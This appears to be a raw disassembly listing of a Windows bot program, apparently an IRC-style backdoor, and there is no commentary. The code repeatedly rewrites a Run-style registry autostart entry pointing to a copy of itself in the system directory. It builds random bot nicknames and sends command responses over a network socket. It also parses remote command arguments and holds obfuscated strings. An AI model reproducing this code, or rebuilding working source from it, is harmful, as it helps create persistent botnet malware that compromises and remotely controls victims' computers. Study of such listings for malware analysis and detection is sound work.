loc_417705:				; CODE XREF: sub_4176BD+1Cj
					; sub_4176BD+39j
		push	[ebp+var_4]
		call	ds:dword_41D010	; RegCloseKey
		push	[ebp+arg_10]
		push	0
		push	[ebp+arg_C]
		call	sub_407F20
		add	esp, 0Ch
		xor	al, al
		leave
		retn
sub_4176BD	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_417722	proc near		; CODE XREF: sub_419C67+134p
					; sub_41A28F+F2p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ebx
		xor	ebx, ebx
		push	ebx
		lea	eax, [ebp+var_4]
		push	eax
		push	ebx
		push	0F003Fh
		push	ebx
		push	ebx
		push	ebx
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	ds:off_41D004
		test	eax, eax
		jz	short loc_417755
		push	[ebp+var_4]
		call	ds:dword_41D010	; RegCloseKey
		xor	al, al

loc_417752:				; CODE XREF: sub_417722+4Ej
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_417755:				; CODE XREF: sub_417722+23j
		push	[ebp+arg_8]
		push	[ebp+var_4]
		call	ds:dword_41D000	; RegDeleteValueA
		test	eax, eax
		jz	short loc_417772

loc_417765:				; CODE XREF: sub_417722+52j
		push	[ebp+var_4]
		call	ds:dword_41D010	; RegCloseKey
		mov	al, bl
		jmp	short loc_417752
; ---------------------------------------------------------------------------

loc_417772:				; CODE XREF: sub_417722+41j
		mov	bl, 1
		jmp	short loc_417765
sub_417722	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=94h


sub_417776	proc near		; CODE XREF: sub_41C28D:loc_41C5D3p

var_114		= dword	ptr -114h
var_110		= dword	ptr -110h
var_10C		= dword	ptr -10Ch
var_108		= dword	ptr -108h
var_104		= byte ptr -104h
var_4		= dword	ptr -4

		push	ebp
		lea	ebp, [esp-94h]
		sub	esp, 114h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+94h+var_4], eax
		push	ebx
		push	esi
		push	edi
		mov	edi, 100h
		push	edi
		call	sub_402A08
		mov	esi, eax
		push	edi
		mov	[ebp+94h+var_110], esi
		call	sub_402A08
		push	edi
		mov	[ebp+94h+var_108], eax
		call	sub_402A08
		push	edi
		mov	[ebp+94h+var_114], eax
		call	sub_402A08
		push	[ebp+94h+var_114]
		mov	[ebp+94h+var_10C], eax
		call	sub_402E05
		push	eax
		xor	ebx, ebx
		push	ebx
		push	[ebp+94h+var_114]
		call	sub_407F20
		push	[ebp+94h+var_10C]
		call	sub_402E05
		push	eax
		push	ebx
		push	[ebp+94h+var_10C]
		call	sub_407F20
		push	edi
		lea	eax, [ebp+94h+var_104]
		push	ebx
		push	eax
		call	sub_407F20
		push	esi
		call	sub_402E05
		add	esp, 40h
		push	eax
		push	ebx
		push	esi
		call	sub_407F20
		push	[ebp+94h+var_108]
		call	sub_402E05
		push	eax
		push	ebx
		push	[ebp+94h+var_108]
		call	sub_407F20
		push	esi
		call	sub_402E05
		push	eax
		mov	ebx, offset byte_426729
		call	sub_419EC1
		mov	esi, [ebp+94h+var_108]
		push	esi
		call	sub_402E05
		push	eax
		mov	ebx, offset byte_426671
		call	sub_419EC1
		mov	ebx, [ebp+94h+var_114]
		push	ebx
		call	sub_402E05
		add	esp, 30h
		dec	eax
		push	eax
		push	ebx
		call	ds:dword_41D0F0	; GetSystemDirectoryA
		push	esi
		mov	esi, [ebp+94h+var_10C]
		push	ebx
		push	offset dword_420198
		push	esi
		call	sub_402E05
		pop	ecx
		dec	eax
		push	eax
		push	esi
		call	sub_402EAE
		mov	eax, esi
		add	esp, 14h
		lea	ecx, [eax+1]

loc_41786E:				; CODE XREF: sub_417776+FDj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41786E
		sub	eax, ecx
		push	edi
		mov	[eax+esi], dl
		lea	eax, [ebp+94h+var_104]
		push	eax
		push	[ebp+94h+var_110]
		push	offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		push	1
		call	sub_4176BD
		add	esp, 14h
		test	al, al
		jz	short loc_4178C1
		lea	eax, [ebp+94h+var_104]
		mov	ecx, esi

loc_41789A:				; CODE XREF: sub_417776+13Cj
		mov	dl, [ecx]
		cmp	dl, [eax]
		jnz	short loc_4178B8
		test	dl, dl
		jz	short loc_4178B4
		mov	dl, [ecx+1]
		cmp	dl, [eax+1]
		jnz	short loc_4178B8
		inc	ecx
		inc	ecx
		inc	eax
		inc	eax
		test	dl, dl
		jnz	short loc_41789A

loc_4178B4:				; CODE XREF: sub_417776+12Cj
		xor	eax, eax
		jmp	short loc_4178BD
; ---------------------------------------------------------------------------

loc_4178B8:				; CODE XREF: sub_417776+128j
					; sub_417776+134j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_4178BD:				; CODE XREF: sub_417776+140j
		test	eax, eax
		jz	short loc_4178D2

loc_4178C1:				; CODE XREF: sub_417776+11Dj
		push	esi
		push	[ebp+94h+var_110]
		push	offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		call	sub_41764F
		add	esp, 0Ch

loc_4178D2:				; CODE XREF: sub_417776+149j
		push	[ebp+94h+var_110]
		call	sub_402F5B
		push	[ebp+94h+var_108]
		call	sub_402F5B
		push	ebx
		call	sub_402F5B
		push	esi
		call	sub_402F5B
		mov	ecx, [ebp+94h+var_4]
		add	esp, 10h
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		add	ebp, 94h
		leave
		retn
sub_417776	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn bp-based	frame


sub_417909	proc near		; DATA XREF: sub_41C28D+357o

var_504		= byte ptr -504h
var_404		= byte ptr -404h
var_403		= byte ptr -403h
var_304		= byte ptr -304h
var_303		= byte ptr -303h
var_204		= byte ptr -204h
var_203		= byte ptr -203h
var_104		= byte ptr -104h
var_103		= byte ptr -103h
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 504h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	esi
		push	edi
		mov	esi, 0FFh
		xor	ebx, ebx
		push	esi
		lea	eax, [ebp+var_203]
		push	ebx
		push	eax
		mov	[ebp+var_204], bl
		call	sub_407F20
		push	esi
		lea	eax, [ebp+var_403]
		push	ebx
		push	eax
		mov	[ebp+var_404], bl
		call	sub_407F20
		push	esi
		lea	eax, [ebp+var_303]
		push	ebx
		push	eax
		mov	[ebp+var_304], bl
		call	sub_407F20
		push	esi
		lea	eax, [ebp+var_103]
		push	ebx
		push	eax
		mov	[ebp+var_104], bl
		call	sub_407F20
		add	esp, 30h
		mov	edi, 100h

loc_41797E:				; CODE XREF: sub_417909+1AEj
		push	edi
		lea	esi, [ebp+var_204]
		mov	ebx, offset byte_426729
		call	sub_419EC1
		push	edi
		lea	esi, [ebp+var_404]
		mov	ebx, offset byte_426671
		call	sub_419EC1
		pop	ecx
		pop	ecx
		mov	esi, 0FFh
		push	esi
		lea	eax, [ebp+var_304]
		push	eax
		call	ds:dword_41D0F0	; GetSystemDirectoryA
		lea	eax, [ebp+var_404]
		push	eax
		lea	eax, [ebp+var_304]
		push	eax
		push	offset aSS_3	; "%s\\%s"
		lea	eax, [ebp+var_104]
		push	esi
		push	eax
		call	sub_402EAE
		lea	eax, [ebp+var_104]
		add	esp, 14h
		lea	ecx, [eax+1]

loc_4179E1:				; CODE XREF: sub_417909+DDj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_4179E1
		sub	eax, ecx
		xor	ebx, ebx
		mov	[ebp+eax+var_104], bl
		push	edi
		lea	eax, [ebp+var_504]
		push	eax
		lea	eax, [ebp+var_204]
		push	eax
		push	offset aSoftwareMicr_1 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		push	1
		call	sub_4176BD
		add	esp, 14h
		test	al, al
		jz	short loc_417A48
		lea	ecx, [ebp+var_504]
		lea	eax, [ebp+var_104]

loc_417A21:				; CODE XREF: sub_417909+130j
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_417A3F
		cmp	dl, bl
		jz	short loc_417A3B
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_417A3F
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		cmp	dl, bl
		jnz	short loc_417A21

loc_417A3B:				; CODE XREF: sub_417909+120j
		xor	eax, eax
		jmp	short loc_417A44
; ---------------------------------------------------------------------------

loc_417A3F:				; CODE XREF: sub_417909+11Cj
					; sub_417909+128j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_417A44:				; CODE XREF: sub_417909+134j
		cmp	eax, ebx
		jz	short loc_417A63

loc_417A48:				; CODE XREF: sub_417909+10Aj
		lea	eax, [ebp+var_104]
		push	eax
		lea	eax, [ebp+var_204]
		push	eax
		push	offset aSoftwareMicr_2 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		call	sub_41764F
		add	esp, 0Ch

loc_417A63:				; CODE XREF: sub_417909+13Dj
		push	edi
		lea	eax, [ebp+var_304]
		push	ebx
		push	eax
		call	sub_407F20
		push	edi
		lea	eax, [ebp+var_104]
		push	ebx
		push	eax
		call	sub_407F20
		push	edi
		lea	eax, [ebp+var_504]
		push	ebx
		push	eax
		call	sub_407F20
		push	edi
		lea	eax, [ebp+var_204]
		push	ebx
		push	eax
		call	sub_407F20
		push	edi
		lea	eax, [ebp+var_404]
		push	ebx
		push	eax
		call	sub_407F20
		add	esp, 3Ch
		push	3A98h
		call	ds:off_41D0F8
		jmp	loc_41797E
sub_417909	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_417ABC	proc near		; CODE XREF: sub_401C1D+C9p
					; sub_401C1D+E4p ...

var_204		= byte ptr -204h
var_203		= byte ptr -203h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= byte ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 204h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		mov	esi, 1FFh
		push	esi
		lea	eax, [ebp+var_203]
		push	0
		push	eax
		mov	[ebp+var_204], 0
		call	sub_407F20
		lea	eax, [ebp+arg_4]
		push	eax
		push	[ebp+arg_0]
		lea	eax, [ebp+var_204]
		push	esi
		push	eax
		call	sub_4037F6
		lea	eax, [ebp+var_204]
		add	esp, 1Ch
		lea	esi, [eax+1]

loc_417B0B:				; CODE XREF: sub_417ABC+54j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_417B0B
		sub	eax, esi
		mov	[ebp+eax+var_204], cl
		lea	eax, [ebp+var_204]
		lea	esi, [eax+1]

loc_417B24:				; CODE XREF: sub_417ABC+6Dj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_417B24
		push	0
		sub	eax, esi
		push	eax
		lea	eax, [ebp+var_204]
		push	eax
		push	dword ptr [edi]
		call	ds:dword_41D228	; send
		mov	ecx, [ebp+var_4]
		test	eax, eax
		setnz	al
		xor	ecx, ebp
		pop	esi
		call	sub_402AD0
		leave
		retn
sub_417ABC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_417B51	proc near		; CODE XREF: sub_40177B+268p
					; sub_4019F3+21Ap ...

var_40C		= dword	ptr -40Ch
var_408		= dword	ptr -408h
var_404		= byte ptr -404h
var_403		= byte ptr -403h
var_204		= byte ptr -204h
var_203		= byte ptr -203h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= byte ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= byte ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 40Ch
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	edi
		mov	[ebp+var_408], eax
		mov	eax, [ebp+arg_8]
		mov	edi, 1FFh
		xor	ebx, ebx
		push	edi
		mov	[ebp+var_40C], eax
		lea	eax, [ebp+var_203]
		push	ebx
		push	eax
		mov	[ebp+var_204], bl
		call	sub_407F20
		push	edi
		lea	eax, [ebp+var_403]
		push	ebx
		push	eax
		mov	[ebp+var_404], bl
		call	sub_407F20
		add	esp, 18h
		cmp	[ebp+arg_4], 1
		jz	loc_417C6D
		push	esi
		push	0Dh
		call	sub_402A08
		mov	esi, eax
		lea	eax, [ebp+arg_10]
		push	eax
		push	[ebp+arg_C]
		lea	eax, [ebp+var_404]
		push	edi
		push	eax
		call	sub_4037F6
		lea	eax, [ebp+var_404]
		add	esp, 14h
		lea	ecx, [eax+1]

loc_417BDE:				; CODE XREF: sub_417B51+92j
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_417BDE
		sub	eax, ecx
		push	esi
		mov	[ebp+eax+var_404], bl
		call	sub_402E05
		push	eax
		mov	ebx, offset asc_426B80 ; "ÞÜÇØÃÝÉ"
		call	sub_419EC1
		lea	eax, [ebp+var_404]
		push	eax
		push	[ebp+var_40C]
		lea	eax, [ebp+var_204]
		push	esi
		push	offset aSSS_1	; "%s %s %s\r\n"
		push	edi
		push	eax
		call	sub_402EAE
		lea	eax, [ebp+var_204]
		add	esp, 20h
		lea	ecx, [eax+1]

loc_417C2B:				; CODE XREF: sub_417B51+DFj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_417C2B
		sub	eax, ecx
		push	esi
		mov	[ebp+eax+var_204], dl
		call	sub_402F5B
		pop	ecx
		lea	eax, [ebp+var_204]
		lea	ecx, [eax+1]
		pop	esi

loc_417C4C:				; CODE XREF: sub_417B51+100j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_417C4C
		sub	eax, ecx
		push	0
		push	eax
		lea	eax, [ebp+var_204]
		push	eax
		mov	eax, [ebp+var_408]
		push	dword ptr [eax]
		call	ds:dword_41D228	; send

loc_417C6D:				; CODE XREF: sub_417B51+5Dj
		mov	ecx, [ebp+var_4]
		pop	edi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn
sub_417B51	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_417C7B	proc near		; CODE XREF: sub_41881F+23Bp
					; sub_418A8C+39p

var_48		= dword	ptr -48h
var_44		= dword	ptr -44h
var_40		= byte ptr -40h
var_3F		= byte ptr -3Fh
var_3C		= byte ptr -3Ch
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 48h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		push	edi
		xor	eax, eax
		mov	[ebp+var_40], 0
		lea	edi, [ebp+var_3F]
		stosw
		stosb
		push	0Dh
		pop	ecx
		mov	esi, offset aQwertyuiopasdf ; "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJ"...
		lea	edi, [ebp+var_3C]
		rep movsd
		lea	eax, [ebp+var_48]
		push	eax
		movsb
		call	ds:off_41D1E8
		call	ds:dword_41D104	; GetTickCount
		mov	ecx, [ebp+var_48]
		mov	edx, [ebp+var_44]
		add	ecx, edx
		cmp	eax, ecx
		jb	short loc_417CC7
		add	ecx, eax
		jmp	short loc_417CC9
; ---------------------------------------------------------------------------

loc_417CC7:				; CODE XREF: sub_417C7B+46j
		sub	ecx, eax

loc_417CC9:				; CODE XREF: sub_417C7B+4Aj
		push	ecx
		call	sub_403716
		pop	ecx
		push	8
		pop	ecx
		xor	eax, eax
		mov	edi, ebx
		rep stosd
		push	offset asc_4203BC ; "["
		stosw
		push	22h
		push	ebx
		stosb
		call	sub_402EAE
		mov	eax, ebx
		add	esp, 0Ch
		lea	esi, [eax+1]

loc_417CF1:				; CODE XREF: sub_417C7B+7Bj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_417CF1
		xor	edi, edi
		sub	eax, esi
		push	edi
		mov	[eax+ebx], cl
		push	4
		pop	ecx
		lea	esi, [ebp+var_40]
		call	sub_419641
		pop	ecx
		mov	eax, esi
		push	eax
		push	ebx
		push	offset aSS	; "%s%s|"
		push	22h
		push	ebx
		call	sub_402EAE
		mov	eax, ebx
		add	esp, 14h
		lea	esi, [eax+1]

loc_417D25:				; CODE XREF: sub_417C7B+AFj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_417D25
		sub	eax, esi
		push	edi
		push	4
		lea	esi, [ebp+var_40]
		mov	[eax+ebx], cl
		call	sub_41960F
		mov	eax, esi
		push	eax
		push	ebx
		push	offset aSS_0	; "%s%s|"
		push	22h
		push	ebx
		call	sub_402EAE
		mov	eax, ebx
		add	esp, 1Ch
		lea	esi, [eax+1]

loc_417D55:				; CODE XREF: sub_417C7B+DFj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_417D55
		sub	eax, esi
		mov	[eax+ebx], cl
		call	sub_419B37
		test	al, al
		jz	short loc_417D8C
		push	ebx
		push	offset aSp	; "%sP|"
		push	22h
		push	ebx
		call	sub_402EAE
		mov	eax, ebx
		add	esp, 10h
		lea	esi, [eax+1]

loc_417D80:				; CODE XREF: sub_417C7B+10Aj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_417D80
		sub	eax, esi
		mov	[eax+ebx], cl

loc_417D8C:				; CODE XREF: sub_417C7B+EDj
		call	sub_419590
		mov	eax, dword_427BDC
		cmp	eax, edi
		mov	ecx, dword_427BD8
		jg	short loc_417DC8
		jl	short loc_417DA7
		cmp	ecx, 0Ah
		jnb	short loc_417DC8

loc_417DA7:				; CODE XREF: sub_417C7B+125j
		push	eax
		push	ecx
		push	ebx
		push	offset aS0I64u	; "%s0%I64u|"
		push	22h
		push	ebx
		call	sub_402EAE
		mov	eax, ebx
		add	esp, 18h
		lea	esi, [eax+1]

loc_417DBF:				; CODE XREF: sub_417C7B+149j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_417DBF
		jmp	short loc_417DE7
; ---------------------------------------------------------------------------

loc_417DC8:				; CODE XREF: sub_417C7B+123j
					; sub_417C7B+12Aj
		push	eax
		push	ecx
		push	ebx
		push	offset aSI64u	; "%s%I64u|"
		push	22h
		push	ebx
		call	sub_402EAE
		mov	eax, ebx
		add	esp, 18h
		lea	esi, [eax+1]

loc_417DE0:				; CODE XREF: sub_417C7B+16Aj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_417DE0

loc_417DE7:				; CODE XREF: sub_417C7B+14Bj
		sub	eax, esi
		mov	byte ptr [eax+ebx], 0
		xor	esi, esi
		cmp	dword_42682C, edi
		jle	short loc_417E34

loc_417DF7:				; CODE XREF: sub_417C7B+1B7j
		call	sub_403723
		push	31h
		pop	ecx
		xor	edx, edx
		div	ecx
		movsx	eax, [ebp+edx+var_3C]
		push	eax
		push	ebx
		push	offset aSC	; "%s%c"
		push	22h
		push	ebx
		call	sub_402EAE
		mov	eax, ebx
		add	esp, 14h
		lea	edi, [eax+1]

loc_417E1F:				; CODE XREF: sub_417C7B+1A9j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_417E1F
		sub	eax, edi
		inc	esi
		mov	[eax+ebx], cl
		cmp	esi, dword_42682C
		jl	short loc_417DF7

loc_417E34:				; CODE XREF: sub_417C7B+17Aj
		push	ebx
		push	offset aS	; "%s]"
		push	22h
		push	ebx
		call	sub_402EAE
		mov	eax, ebx
		add	esp, 10h
		lea	esi, [eax+1]

loc_417E4A:				; CODE XREF: sub_417C7B+1D4j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_417E4A
		sub	eax, esi
		mov	[eax+ebx], cl
		mov	ecx, [ebp+var_4]
		pop	edi
		xor	ecx, ebp
		mov	eax, ebx
		pop	esi
		call	sub_402AD0
		leave
		retn
sub_417C7B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_417E66	proc near		; CODE XREF: sub_41802D+6A7p

var_820		= dword	ptr -820h
var_81C		= dword	ptr -81Ch
var_20		= byte ptr -20h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 824h
		push	ebx
		push	esi
		push	edi
		push	offset asc_420374 ; " "
		push	[ebp+arg_14]
		xor	ebx, ebx
		mov	byte ptr [ebp+var_8], 0
		mov	[ebp+var_4], ebx
		call	sub_403DF4
		jmp	short loc_417EC8
; ---------------------------------------------------------------------------

loc_417E8A:				; CODE XREF: sub_417E66+68j
		mov	eax, [ebp+var_4]
		push	offset aS_8	; "-s"
		push	esi
		mov	[ebp+eax*4+var_820], esi
		call	sub_402C69
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_417EB6
		push	offset aS_9	; "/s"
		push	esi
		call	sub_402C69
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_417EBA

loc_417EB6:				; CODE XREF: sub_417E66+3Dj
		mov	byte ptr [ebp+var_8], 1

loc_417EBA:				; CODE XREF: sub_417E66+4Ej
		push	offset asc_420380 ; " "
		push	ebx
		call	sub_403DF4
		inc	[ebp+var_4]

loc_417EC8:				; CODE XREF: sub_417E66+22j
		mov	esi, eax
		cmp	esi, ebx
		pop	ecx
		pop	ecx
		jnz	short loc_417E8A
		mov	edi, [ebp+arg_0]
		mov	esi, [ebp+var_820]
		add	edi, 5
		mov	edx, edi
		mov	ecx, esi

loc_417EE0:				; CODE XREF: sub_417E66+92j
		mov	al, [ecx]
		cmp	al, [edx]
		jnz	short loc_417EFE
		test	al, al
		jz	short loc_417EFA
		mov	al, [ecx+1]
		cmp	al, [edx+1]
		jnz	short loc_417EFE
		inc	ecx
		inc	ecx
		inc	edx
		inc	edx
		test	al, al
		jnz	short loc_417EE0

loc_417EFA:				; CODE XREF: sub_417E66+82j
		xor	eax, eax
		jmp	short loc_417F03
; ---------------------------------------------------------------------------

loc_417EFE:				; CODE XREF: sub_417E66+7Ej
					; sub_417E66+8Aj
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_417F03:				; CODE XREF: sub_417E66+96j
		cmp	eax, ebx
		jz	short loc_417F14
		mov	eax, edi
		mov	ecx, esi
		call	sub_419834
		test	eax, eax
		jz	short loc_417F40

loc_417F14:				; CODE XREF: sub_417E66+9Fj
		xor	eax, eax
		cmp	[ebp+var_4], ebx
		jle	short loc_417F3D
		mov	ecx, [ebp+var_4]
		dec	ecx

loc_417F1F:				; CODE XREF: sub_417E66+CFj
		cmp	eax, ecx
		jz	short loc_417F31
		mov	edx, [ebp+eax*4+var_81C]
		mov	[ebp+eax*4+var_820], edx

loc_417F31:				; CODE XREF: sub_417E66+BBj
		inc	eax
		cmp	eax, [ebp+var_4]
		jl	short loc_417F1F
		mov	esi, [ebp+var_820]

loc_417F3D:				; CODE XREF: sub_417E66+B3j
		dec	[ebp+var_4]

loc_417F40:				; CODE XREF: sub_417E66+ACj
		cmp	byte ptr [ebp+var_8], bl
		jz	short loc_417F48
		dec	[ebp+var_4]

loc_417F48:				; CODE XREF: sub_417E66+DDj
		mov	al, [esi]
		cmp	al, byte_4265F8
		jnz	loc_418026
		mov	eax, esi
		lea	ecx, [eax+1]

loc_417F5B:				; CODE XREF: sub_417E66+FAj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_417F5B
		sub	eax, ecx
		push	eax
		lea	eax, [esi+1]
		push	eax
		push	esi
		call	sub_403CD0
		mov	eax, dword_435290
		mov	esi, [eax]
		mov	ebx, offset dword_43528C
		mov	edi, ebx
		add	esp, 0Ch
		mov	[ebp+var_C], esi
		mov	[ebp+var_10], edi

loc_417F86:				; CODE XREF: sub_417E66+192j
		test	edi, edi
		mov	eax, dword_435290
		mov	[ebp+var_14], eax
		jz	short loc_417F96
		cmp	edi, ebx
		jz	short loc_417F9B

loc_417F96:				; CODE XREF: sub_417E66+12Aj
		call	sub_40331D

loc_417F9B:				; CODE XREF: sub_417E66+12Ej
		cmp	esi, [ebp+var_14]
		jz	loc_418026
		test	edi, edi
		jnz	short loc_417FAD
		call	sub_40331D

loc_417FAD:				; CODE XREF: sub_417E66+140j
		cmp	esi, [edi+4]
		jnz	short loc_417FB7
		call	sub_40331D

loc_417FB7:				; CODE XREF: sub_417E66+14Aj
		mov	ecx, [ebp+var_820]
		lea	eax, [esi+0Ch]

loc_417FC0:				; CODE XREF: sub_417E66+172j
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_417FDE
		test	dl, dl
		jz	short loc_417FDA
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_417FDE
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		test	dl, dl
		jnz	short loc_417FC0

loc_417FDA:				; CODE XREF: sub_417E66+162j
		xor	eax, eax
		jmp	short loc_417FE3
; ---------------------------------------------------------------------------

loc_417FDE:				; CODE XREF: sub_417E66+15Ej
					; sub_417E66+16Aj
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_417FE3:				; CODE XREF: sub_417E66+176j
		test	eax, eax
		jz	short loc_417FFA
		lea	edi, [ebp+var_20]
		lea	esi, [ebp+var_10]
		call	sub_40168C
		mov	esi, [ebp+var_C]
		mov	edi, [ebp+var_10]
		jmp	short loc_417F86
; ---------------------------------------------------------------------------

loc_417FFA:				; CODE XREF: sub_417E66+17Fj
		cmp	esi, [edi+4]
		jnz	short loc_418004
		call	sub_40331D

loc_418004:				; CODE XREF: sub_417E66+197j
		mov	ecx, [esi+8]
		mov	eax, [ecx]
		lea	edx, [ebp+var_820]
		push	edx
		mov	edx, [ebp+var_4]
		dec	edx
		push	edx
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+var_8]
		push	[ebp+arg_4]
		call	dword ptr [eax]

loc_418026:				; CODE XREF: sub_417E66+EAj
					; sub_417E66+138j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn	18h
sub_417E66	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41802D	proc near		; CODE XREF: sub_4186F1+107p

var_10F34	= dword	ptr -10F34h
var_10734	= dword	ptr -10734h
var_10730	= dword	ptr -10730h
var_1072C	= byte ptr -1072Ch
var_1062C	= byte ptr -1062Ch
var_1052C	= byte ptr -1052Ch
var_1042C	= byte ptr -1042Ch
var_72C		= byte ptr -72Ch
var_72B		= byte ptr -72Bh
var_62C		= byte ptr -62Ch
var_62B		= byte ptr -62Bh
var_52C		= byte ptr -52Ch
var_52B		= byte ptr -52Bh
var_52A		= byte ptr -52Ah
var_32C		= byte ptr -32Ch
var_32B		= byte ptr -32Bh
var_22C		= byte ptr -22Ch
var_22B		= byte ptr -22Bh
var_1AC		= byte ptr -1ACh
var_1AB		= byte ptr -1ABh
var_A8		= byte ptr -0A8h
var_A7		= byte ptr -0A7h
var_78		= byte ptr -78h
var_77		= byte ptr -77h
var_54		= byte ptr -54h
var_53		= byte ptr -53h
var_44		= byte ptr -44h
var_43		= byte ptr -43h
var_38		= byte ptr -38h
var_37		= byte ptr -37h
var_2C		= byte ptr -2Ch
var_2B		= byte ptr -2Bh
var_20		= byte ptr -20h
var_1F		= byte ptr -1Fh
var_14		= byte ptr -14h
var_13		= byte ptr -13h
var_10		= dword	ptr -10h
var_8		= dword	ptr -8
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		mov	eax, 10F38h
		call	sub_4117B0
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_8], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		push	edi
		mov	esi, 1FFh
		xor	ebx, ebx
		push	esi
		mov	[ebp+var_10734], eax
		lea	eax, [ebp+var_52B]
		mov	edi, ecx
		push	ebx
		push	eax
		mov	[ebp+var_10730], edi
		mov	[ebp+var_52C], bl
		call	sub_407F20
		add	esp, 0Ch
		push	edi
		push	offset aS_12	; "%s"
		lea	eax, [ebp+var_52C]
		push	esi
		push	eax
		call	sub_402EAE
		lea	eax, [ebp+var_52C]
		add	esp, 10h
		lea	edi, [eax+1]

loc_418095:				; CODE XREF: sub_41802D+6Dj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_418095
		sub	eax, edi
		mov	[ebp+eax+var_52C], bl
		lea	eax, [ebp+var_52C]
		push	offset asc_420300 ; " :"
		push	eax
		call	sub_403B70
		push	eax
		push	offset aS_13	; "%s"
		lea	eax, [ebp+var_52C]
		push	esi
		push	eax
		call	sub_402EAE
		lea	eax, [ebp+var_52C]
		add	esp, 18h
		lea	esi, [eax+1]

loc_4180D5:				; CODE XREF: sub_41802D+ADj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_4180D5
		sub	eax, esi
		mov	[ebp+eax+var_52C], bl
		lea	eax, [ebp+var_52C]
		lea	esi, [eax+1]

loc_4180EE:				; CODE XREF: sub_41802D+C6j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_4180EE
		sub	eax, esi
		push	eax
		lea	eax, [ebp+var_52A]
		push	eax
		lea	eax, [ebp+var_52C]
		push	eax
		call	sub_403CD0
		add	esp, 0Ch
		push	offset asc_420308 ; " "
		push	[ebp+var_10730]
